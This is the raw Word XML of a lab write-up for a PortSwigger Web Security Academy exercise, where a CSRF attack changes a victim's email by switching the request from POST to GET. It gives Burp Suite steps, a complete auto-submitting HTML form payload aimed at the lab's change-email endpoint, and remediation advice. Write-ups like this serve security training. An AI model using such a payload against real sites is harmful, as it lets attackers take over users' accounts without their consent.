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9D2FA" w14:textId="77777777" w:rsidR="00320924" w:rsidRDefault="002F152E" w:rsidP="002F152E">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F71F9" w14:textId="2D693D6C" w:rsidR="002F152E" w:rsidRDefault="00C84C96" w:rsidP="006B684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The application </w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>consists of an email change functionality which is vulnerable to CSRF</w:t>
      </w:r>
      <w:r w:rsidR="00466759">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> but it blocks all POST requests and accepts GET requests</w:t>
      </w:r>
      <w:r w:rsidR="00C44177">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>. We will try to mount an exploit and deliver it to the target with the help of an exploit server</w:t>
      </w:r>
      <w:r w:rsidR="005B750D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to change the email address of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C643D4A" w14:textId="77777777" w:rsidR="00675428" w:rsidRDefault="00675428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C9025EF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7067F2A5" w14:textId="343453D6" w:rsidR="001007B5" w:rsidRDefault="007F5950" w:rsidP="00E314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</w:t>
      </w:r>
      <w:r w:rsidR="0038106E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the vulnerable web applications</w:t>
      </w:r>
      <w:r w:rsidR="0033120F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">and log in with the username and password provided to act as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00840938">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>an</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E31496">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03325C92" w14:textId="4A2C8E91" w:rsidR="00E31496" w:rsidRDefault="00840938" w:rsidP="00E314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Then change the email once to study the HTTP request and response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321D4B46" w14:textId="5ABF91C4" w:rsidR="0052488A" w:rsidRDefault="0052488A" w:rsidP="00E314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the BurpSuite’s Proxy tab right click on the request and select Engagement tools and then on generate CSRF PoC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8C67F" w14:textId="0C095EAE" w:rsidR="00BC3984" w:rsidRDefault="00BC3984" w:rsidP="00E314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Then in the dialogue box enable the option to auto-submit script and click Regenerate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF2DF48" w14:textId="58447FCD" w:rsidR="00970BF8" w:rsidRDefault="00970BF8" w:rsidP="00E314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 to the exploit server and paste the request into the body tag of the exploit and then click store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242475AA" w14:textId="4285A1E6" w:rsidR="000564D4" w:rsidRDefault="000564D4" w:rsidP="00E314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At the end, click the button to deliver the exploit to the victim</w:t>
      </w:r>
      <w:r w:rsidR="005657B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>, we will see that our POST request gets rejected due to security measures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72287575" w14:textId="285E0387" w:rsidR="00380DB3" w:rsidRPr="001007B5" w:rsidRDefault="00380DB3" w:rsidP="00E314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 modify the request from POST to GET in order to get it through the security protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361F39F9" w14:textId="77777777" w:rsidR="00131AF3" w:rsidRDefault="00131AF3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117D4FE" w14:textId="1F55B576" w:rsidR="00CD3D3A" w:rsidRDefault="002F152E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</w:t>
      </w:r>
      <w:r w:rsidR="00BD4233">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>OAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD26F4" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C2766" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72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6C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;!--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> CSRF PoC - generated by Burp Suite Professional --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F035D8" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E6560" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>history.pushState</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>('', '', '/')&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3993FFC6" w14:textId="696CA76B" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;form action="https://0a5f00f6030be8ae85e982a5003f0055.web-security-academy.net/my-account/change-email" method="</w:t>
      </w:r>
      <w:r w:rsidR="00572214">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC817FB" w14:textId="3BDB5400" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="hidden" name="email" value="</w:t>
      </w:r>
      <w:r w:rsidR="008F2B4A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>rudransh@gmail.c</w:t>
      </w:r>
      <w:r w:rsidR="00EC1C27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>om</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CFC36" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      &lt;input type="submit" value="Submit request" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24745931" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8E81C6" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C154A0A" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72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6C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>document.forms</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>[0].submit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C65BEB" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC10AA1" w14:textId="77777777" w:rsidR="006C0B72" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">  &lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689156CE" w14:textId="3BC1AE89" w:rsidR="006C25F7" w:rsidRPr="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B72">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0B72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9F744A" w14:textId="24C4D243" w:rsidR="006C0B72" w:rsidRDefault="006C0B72" w:rsidP="006C0B7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104BE00" w14:textId="0D3D6212" w:rsidR="002D0DC9" w:rsidRPr="006C0B72" w:rsidRDefault="004F4E6F" w:rsidP="00242C6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E6F2A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02880E9A" wp14:editId="19EB9974">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>376555</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4730750" cy="4648200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1121101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1014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4E6F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs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27AC8D18" wp14:editId="75B559E5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>5176520</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5400675" cy="2394585"/>
            <wp:effectExtent l="0" t="0" r="9525" b="5715"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="435469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4697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0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6331C2" w14:textId="4090617D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REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74250D57" w14:textId="199B5131" w:rsidR="00E323A2" w:rsidRPr="00E323A2" w:rsidRDefault="00E323A2" w:rsidP="00E323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E323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Avoid State-Changing GET Requests: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323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>It's a best practice to never use GET requests for state-changing operations. Such operations should exclusively use POST requests or other appropriate HTTP methods. Implement this rule to mitigate the threat of such CSRF attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7C5E66" w14:textId="6B345B5B" w:rsidR="00E323A2" w:rsidRPr="00E323A2" w:rsidRDefault="00E323A2" w:rsidP="00E323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E323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Anti-CSRF Tokens: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323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Even if you're using GET requests, you can still implement anti-CSRF tokens. This ensures that the server checks for the presence and correctness of a token for every sensitive request. While it's less conventional to use CSRF tokens with GET requests, it's feasible when you need to secure state-changing GET endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E78AB9B" w14:textId="76DE24EF" w:rsidR="002F152E" w:rsidRPr="00E323A2" w:rsidRDefault="00E323A2" w:rsidP="00E323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E323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Referer and Origin Header Checks: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323A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement server-side checks for the Referer and Origin headers to ensure the request is coming from a trusted origin. If the headers are missing or don't match expected values, reject the request.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="002F152E" w:rsidRPr="00E323A2" w:rsidSect="002F15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B22D7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70980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A0C38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78723420"/>
    <w:lvl w:ilvl="0" w:tplc="2F346B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01061"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E858FE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541AC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5BA43B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F1E49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C08091DC"/>
    <w:lvl w:ilvl="0" w:tplc="26D401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FE702B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15E4504E"/>
    <w:lvl w:ilvl="0" w:tplc="EB68B4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F30063"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="412CA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083980">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1806852917">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1019623095">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="152180400">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129974817">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883975352">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="17117639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2E"/>
    <w:rsid w:val="000149B5"/>
    <w:rsid w:val="00017B26"/>
    <w:rsid w:val="00017D37"/>
    <w:rsid w:val="000316DD"/>
    <w:rsid w:val="000564D4"/>
    <w:rsid w:val="00087DD8"/>
    <w:rsid w:val="00093FF4"/>
    <w:rsid w:val="000B5333"/>
    <w:rsid w:val="000D5093"/>
    <w:rsid w:val="000D7CE5"/>
    <w:rsid w:val="000E4A5B"/>
    <w:rsid w:val="000F0291"/>
    <w:rsid w:val="000F4FE7"/>
    <w:rsid w:val="000F5F61"/>
    <w:rsid w:val="001007B5"/>
    <w:rsid w:val="00115586"/>
    <w:rsid w:val="00131AF3"/>
    <w:rsid w:val="00146DDF"/>
    <w:rsid w:val="0014796E"/>
    <w:rsid w:val="0015780E"/>
    <w:rsid w:val="00165B56"/>
    <w:rsid w:val="001768CB"/>
    <w:rsid w:val="00193EED"/>
    <w:rsid w:val="001E0828"/>
    <w:rsid w:val="001E5754"/>
    <w:rsid w:val="001E5BF4"/>
    <w:rsid w:val="001E698E"/>
    <w:rsid w:val="001F222F"/>
    <w:rsid w:val="001F478F"/>
    <w:rsid w:val="00206207"/>
    <w:rsid w:val="00212AC8"/>
    <w:rsid w:val="002207B3"/>
    <w:rsid w:val="0022338E"/>
    <w:rsid w:val="00226D86"/>
    <w:rsid w:val="00242C66"/>
    <w:rsid w:val="00245816"/>
    <w:rsid w:val="00247E82"/>
    <w:rsid w:val="002519AC"/>
    <w:rsid w:val="0026137F"/>
    <w:rsid w:val="00262D06"/>
    <w:rsid w:val="0028480B"/>
    <w:rsid w:val="00290689"/>
    <w:rsid w:val="002A1A1E"/>
    <w:rsid w:val="002A5040"/>
    <w:rsid w:val="002A7B99"/>
    <w:rsid w:val="002B0D4E"/>
    <w:rsid w:val="002C1EC0"/>
    <w:rsid w:val="002D0DC9"/>
    <w:rsid w:val="002D2C78"/>
    <w:rsid w:val="002E6F2A"/>
    <w:rsid w:val="002F152E"/>
    <w:rsid w:val="002F3625"/>
    <w:rsid w:val="002F54EB"/>
    <w:rsid w:val="0030439C"/>
    <w:rsid w:val="00317C2D"/>
    <w:rsid w:val="003202F7"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="0033120F"/>
    <w:rsid w:val="003358E4"/>
    <w:rsid w:val="0036197C"/>
    <w:rsid w:val="00380DB3"/>
    <w:rsid w:val="0038106E"/>
    <w:rsid w:val="00385CF9"/>
    <w:rsid w:val="00392C30"/>
    <w:rsid w:val="003978F4"/>
    <w:rsid w:val="003A5F44"/>
    <w:rsid w:val="003C1DDC"/>
    <w:rsid w:val="003D523D"/>
    <w:rsid w:val="00437C9B"/>
    <w:rsid w:val="00454915"/>
    <w:rsid w:val="00466759"/>
    <w:rsid w:val="00482A06"/>
    <w:rsid w:val="00495017"/>
    <w:rsid w:val="004C039A"/>
    <w:rsid w:val="004C075B"/>
    <w:rsid w:val="004C3608"/>
    <w:rsid w:val="004C37DD"/>
    <w:rsid w:val="004E26E8"/>
    <w:rsid w:val="004F4E6F"/>
    <w:rsid w:val="005036F1"/>
    <w:rsid w:val="00513F5E"/>
    <w:rsid w:val="0052488A"/>
    <w:rsid w:val="00532A89"/>
    <w:rsid w:val="00554D32"/>
    <w:rsid w:val="00557B86"/>
    <w:rsid w:val="005657B0"/>
    <w:rsid w:val="0057090A"/>
    <w:rsid w:val="00572214"/>
    <w:rsid w:val="00591996"/>
    <w:rsid w:val="0059201C"/>
    <w:rsid w:val="005A5FE5"/>
    <w:rsid w:val="005B588A"/>
    <w:rsid w:val="005B750D"/>
    <w:rsid w:val="005C275F"/>
    <w:rsid w:val="005C5A61"/>
    <w:rsid w:val="005E6AA5"/>
    <w:rsid w:val="005E7D42"/>
    <w:rsid w:val="006009AF"/>
    <w:rsid w:val="00620059"/>
    <w:rsid w:val="00626274"/>
    <w:rsid w:val="00631DB6"/>
    <w:rsid w:val="00640BC6"/>
    <w:rsid w:val="00644335"/>
    <w:rsid w:val="00675428"/>
    <w:rsid w:val="00682DCE"/>
    <w:rsid w:val="00686C72"/>
    <w:rsid w:val="00692320"/>
    <w:rsid w:val="006B684D"/>
    <w:rsid w:val="006B7049"/>
    <w:rsid w:val="006C0B72"/>
    <w:rsid w:val="006C25F7"/>
    <w:rsid w:val="006C26C7"/>
    <w:rsid w:val="006E57C3"/>
    <w:rsid w:val="00705B8A"/>
    <w:rsid w:val="00713B95"/>
    <w:rsid w:val="007236F6"/>
    <w:rsid w:val="007244DD"/>
    <w:rsid w:val="0074089A"/>
    <w:rsid w:val="00774583"/>
    <w:rsid w:val="00782EF7"/>
    <w:rsid w:val="00792BB3"/>
    <w:rsid w:val="007977EA"/>
    <w:rsid w:val="007B5BBE"/>
    <w:rsid w:val="007C289E"/>
    <w:rsid w:val="007F5950"/>
    <w:rsid w:val="008264C3"/>
    <w:rsid w:val="00840938"/>
    <w:rsid w:val="00857CA7"/>
    <w:rsid w:val="0086200C"/>
    <w:rsid w:val="00864B78"/>
    <w:rsid w:val="008666AA"/>
    <w:rsid w:val="008862F8"/>
    <w:rsid w:val="00893E8D"/>
    <w:rsid w:val="008B60AF"/>
    <w:rsid w:val="008C0C10"/>
